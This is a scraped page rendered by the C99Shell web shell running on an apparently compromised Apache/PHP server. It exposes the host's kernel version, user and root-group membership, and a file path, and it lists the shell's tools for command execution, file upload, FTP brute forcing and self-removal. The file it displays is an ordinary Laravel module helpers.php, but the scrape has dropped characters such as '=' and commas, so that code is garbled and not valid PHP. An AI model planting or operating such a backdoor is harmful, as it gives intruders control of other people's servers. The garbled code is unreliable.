!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/akaunting/module/src/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     helpers.php (1.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

if (!function_exists('module')) {
    
/**
     * Get the Module instance
     *
     * @param string $alias
     *
     * @return mixed
     */
    
function module($alias null)
    {
        
$module app('module');

        if (
is_null($alias)) {
            return 
$module;
        }

        return 
$module->get($alias);
    }
}

if (!
function_exists('module_attribute')) {
    
/**
     * Get an attribute from module.json file
     *
     * @param string $alias
     * @param string $attribute
     *
     * @return mixed
     */
    
function module_attribute($alias$attribute)
    {
        return 
app('module')->get($alias)->get($attribute);
    }
}

if (!
function_exists('module_version')) {
    
/**
     * Get the module version
     *
     * @param string $alias
     *
     * @return mixed
     */
    
function module_version($alias)
    {
        return 
app('module')->get($alias)->get('version');
    }
}

if (!
function_exists('module_path')) {
    
/**
     * Get the module path
     *
     * @param string $alias
     *
     * @return mixed
     */
    
function module_path($alias$path '')
    {
        return 
app('module')->get($alias)->getPath() . ($path '/' $path $path);
    }
}

if (!
function_exists('config_path')) {
    
/**
     * Get the configuration path.
     *
     * @param string $path
     *
     * @return string
     */
    
function config_path($path '')
    {
        return 
app()->basePath() . '/config' . ($path '/' $path $path);
    }
}

if (!
function_exists('public_path')) {
    
/**
     * Get the path to the public folder.
     *
     * @param string $path
     *
     * @return string
     */
    
function public_path($path '')
    {
        return 
app()->make('path.public') . ($path '/' $path $path);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--